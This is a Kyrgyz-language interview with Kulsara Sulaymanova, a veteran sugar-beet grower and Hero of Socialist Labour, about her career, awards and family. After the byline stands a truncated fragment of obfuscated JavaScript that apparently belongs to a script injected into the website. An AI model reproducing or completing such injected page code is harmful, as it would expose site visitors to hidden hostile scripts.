Баатыр кызылчачы – Күлсара Сулайманова

5-К Сулайманова

Бир гектардан миӊ центнер,

Мыкты экен, кана, көрөйүн,

Колуӊуздан өбөйүн.

Колумдун несин өбөсүӊ,

Туурук-туурук капкара,

Көӊүлү айныр жаш бала.

Сулуулук сыпат кимде жок,

Бакыттын өӊү өзүӊдөй,

Бакыт сенин колуӊда,  – деп улуу акын Алыкул Осмонов жазган ыр кыргыздын Күлсара Сулайманова сыяктуу эмгекчил кыздарынын күжүрмөн жетишкендиктерине болгон терең ыраазычылыгынан улам жаралса керек.

Мекенине ак дил, ак ниеттен кызмат кылган, ушул кезде да ак эмгектен үмүтүн үзбөгөн Баатыр эне, Социалисттик эмгектин Баатыры, 86 жаштагы Күлсара Сулайманова учурда Панфилов районундагы Жайылма айылында жашайт.

Баатыр энеден интервью алуу максатында үйүнө барганымда маанайы жаркып, дасторконун жайып, “кечээ түнү жыйырма сегизинчи чөбөрөм жарыкка келди” деп сүйүнчүлөп, көңүлү көкөлөп турду. Чай үстүндө көпкө чейин баарлашып, тарыхта калчу ары кызыктуу, ары кымбат сүрөттөрүн териштире карап, эненин басып өткөн жолу тууралуу  сөз улап жаттык. Күлсара апа мени өзүнүн жайдарылыгы, жашоого болгон сүйүүсү, кыйынчылык убактардан кабагым-кашым дебей күчтүү дымагы, өжөрлүгү аркылуу чыкканы менен таңгалдырды.

– Күлсара апа, кызылчачынын түмөн түйшүктүү ишинде сыймыкка да, сыйлыкка да жетишиңизге чейинки башат жолуңузду эскерип бересизби?

– Ал убакта биз жаш кезден тарта иштедик да. Туулуп-өскөн жерим – Панфилов районунун Каптал-Арык айылында 7-класста окуп жүргөнүмдө колхозго мүчө болуп кирдим. 13 жаштагы курагым. Башында кыйын болду, азыркыдай техника деген жок, кызылча талаасында баарын кол менен бүтүрчүбүз. 1947-жылы, 17 жаш курагымда коӊшу айылга, Жайылмага келин болуп, үй-бүлөлүк турмуш жолуна аттандым. Бирок, тынымсыз эмгектендим. 1957-жылы звено башчысы болдум. Ошол учурда кызылча чаап иштеген кыз-келиндер абдан шайдоот маанайда иштешчү. Өзүбүздүн маанайыбызды өзүбүз көтөрүп, өзүбүздү кубаттап, иштеп жаткан учурда дайыма ырдачубуз. Маанай жакшы болгондо чарчоону деле билбей калчубуз.

– Ошол  ырдаган ырлардын саптары эсиңизде калдыбы?

– Жайкалган сап-сап кызылча,

Жарашыгы ушунча.

Жалбырагы жайкалат,

Жай учкан тоонун кушунча.

Эмгегибиз тек кетмек,

Эрежеси бузулса.

Социалисттик жарышта,

Жакшы го дейм озгонум.

Мол түшүмдү алсам деп,

Тонналап кыкты топтодум.

Кызылчам жолдун боюнда,

Кызыл бычак колумда.

Арбындап түшүм алсам деп,

Ар дайым турат ойумда.

– Чоң ырахмат, апа, 60-70 жыл мурунку ыр саптарын унутпай, бизге эскерип бергениңизге. Сиз эмгек менен таанылган, эмгек менен көп жакшылыкка, ийгиликке, бийиктикке  жеткен, эмгек менен өмүр бою эриш-аркак жүргөн адамсыз. Айтсаңыз, эмгектен талбаган адам кандай болот?

– Чын дилинен эмгек кылган адамга, эмгегинин акыбети сөзсүз түрдө эки эселеп жакшылыгы менен кайтып келет. Эмгек менен мээнет өзүнүн жакшысын бербей койбоөт. Биз кант кызылчасынын гектарынан 500-900 центнерден түшүм жыйначубуз. Эмгегимди өкмөт баалап, 1965-жылы Социалисттик Эмгектин Баатыры деген наам ыйгарышты. Ал эми 1966-жылы Кыргыз ССР Жогорку Советине депутат кылып шайлашты. 1975-жылы да Кыргызстандын Жогорку Советине кайрадан депутат болдум. Советтер Союзунун Коммунисттер партиясынын XXIV съездине 1971-жылы, ал эми XXV съездине 1976-жылы катышып, Кыргызстан Компартиясынан делегат болуп бардым. Москвадагы бюджеттик комиссияда мүчө болдум.  “Ленин ордени”, “Октябрь революциясы ордени”, “Эмгек кызыл туу ордени”, “Даңк медалы”, ВДНХнын алтын жылдыздары менен сыйландым. Бирок биз наам алалы, сыйлык алалы, депутат бололу дебей, бүгүнкү ишибизди так аткаралы, жоопкерчилигибизден кайтпайлы, элге, партияга кызмат кылалы деп эле эмгектене берчүбүз. Анан албетте, жакшы сөз жан эргитет деген сыӊары, баалап-баркташса күч-кубат алып, демге толуп каласың. Жакшы, туура мамиле адамды ого бетер шыктандырып жиберет экен.

5-Брежнев

Күлсара Сулайманова нан менен Советтер Союзунун КП БКсынын генералдык секретары Леонид Брежневди Кыргызстан КП БКсынын биринчи секретары Турдакун Усубалиев, мамлекеттик ишмерлер Төрөбай Кулатов, Акматбек Сүйүнбаев жана башкалар менен бирге тосуп алууда.  

– Сиз Советтер Союзунун Коммунисттер партиясынын Борбордук Комитетинин генералдык секретары Леонид Брежневди жана СССРдин Министрлер Советинин председатели Алексей Косыгинди ошол кездеги өлкө башчысы жана көрүнүктүү мамлекеттик ишмерлери менен бирге тосуптурсуз. Ушул боюнча сөз кылып берсеңиз?

– 15 республиканын башчысы Брежнев Кыргызстанга биринчи жолу келе турган болуп, алдын ала дайынданып калдык. Мен Фрунзе шаарына үч күн мурун эрте келип,тынбай камдандык. Кыргыз элинин атынан нан кармап тосуп алууга мени бекитишти. Брежневге нан сунуп жатып, кыргыз элине келгендигиӊизди чын жүрөктөн куттуктайм деген каалоолорумду айткам. Андан кийин Косыгин да келет дешкенинен, Турдакун Усубалиев, Төрөбай Кулатов, Акматбек Сүйүнбаев жана башкалар болуп тосуп ала турган болдук. Москвадагы бюджеттик комиссияда мүчө болуп жүргөнүбүздө ал киши бизди билчү. Ошентип, ал кишини да тосуп алдык. Кол алышып учурашкан соӊ, Косыгин мага кайрылып: “Быйылкы түшүмүӊ кандай болду?” деп сурады. Мен мыкты түшүм алганыбызды сыймыктануу менен айттым. Көп өтпөй, аны менен болгон жалпы жыйын учурунда Кыргызстан шекеринин таттуулугу менен СССР боюнча 3-орунда тураарын билдирди. Ошол сөздү уккандагы биздин кубанычыбызда чек жок эле.

– Сизге ар дайым иш менен жүргөнгө туура келди, жет жерлерге чыгып жүрдүңүз, мындайда үй-бүлөңүздө көйгөйлөр жаралган жокпу?

– Эмгегимди өлкө үчүн арнап жүргөн ошол мезгилде жолдошум жана кайын журтум колдобосо, мен мындай ийгиликтерди жарата алмак эмесмин. Биздин үй-бүлөдө “Баары бирөө үчүн, бирөө баары үчүн” деген ураан сөзгө таянып жашачубуз. Бул да болсо бири-бирибизге болгон сый-урмат, түшүнүктүүлүк болчу. Ыраматылык жолдошум жөнү жок кызганбай, мунуң аял кишинин орду эмес дебей, тескерисинче колунан келишинче мага жөлөк-таяк, тирек, аскар тоо болуп берчү.

Бир жолу, дагы Москвага жөнөп калдым, балдарым жаш, кичине болгондугунан, өзүм менен чогуу алып алайын дедим. Анткени, ал жакта атайы бала багуучулар бар болчу. Бирок жолдошум: “Ишиң өтө жоопкерчиликтүү, анан ал жактан балдар үчүн алагды болосуӊ, санааӊ бөлүндү болот, жолдон да кыйналып каласыӊар” деп макул болбой койду. Ал дайыма балдарды кайын эжемдин жардамдашуусу менен алып калчу. Бири-бирибизге болгон ишенимдин, түшүнүктүүлүктүн аркасы менен бир коломтонун отун өчүрбөй, 12 баланын ата-энеси болгонбуз.

5-Косыгин

СССРдин Министрлер Советинин председатели Алексей Косыгинди тосуп алуу. 1966-1970-жылдардагы сегизинчи беш жылдык Косыгиндин экономикалык реформалары деп белгиленген жана советтик тарыхта бул мезгил эң ийгиликтүү болуп, “алтын” деген аталышка татыган. 

– Маегиңиз үчүн чоң ырахмат! Ден соолугуңуз бекем болуп, чөбөрө-кыбыралар дагы төрөлүп, сизди кубантуу менен кубатка толтура берсин!

Бүтүндөй республиканын сыймыгы болгон Күлсара Сулайманованы Панфилов районунун эли өзгөчө урмат-сыйга бөлөшөт. Анын ысымын өзү жашаган көчөгө жана райондун борбору болгон Кайыӊды шаарчасынын №2 мектеп-гимназиясына ыйгарышып, ал мектепке музей уюштурушкан. Баатыр эне 86 жашка келгенине карабай, мектептеги иш-чаралардан калбай катышууга, окуучуларга насаатын айтып турууга ар убак далалат жасайт. Ал эми окуу жылынын аягындагы акыркы коӊгуроо салтанатында мыкты жетишкендиктеги окуучуларга өзүнүн атынан акчалай стипендия тапшырып турат. Мындан тышкары, Күлсара Сулайманованын атындагы спорттун түрлөрүнөн турнирлер өткөрүлүп турат. Мына жакында, 6-февраль күнү да воллейбол боюнча турнир өтүп, эмгек менен мээнеттин баркына жеткен, башкаларга үлгү, өрнөк болгон эненин баатырдыгына урмат көргөзүшүп, жаш муун өздөрүнүн дене машыгуусу, спортко болгон сүйүүсү аркылуу таазим этишти.

Кундуз ШАБДАНАЛИЕВА

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *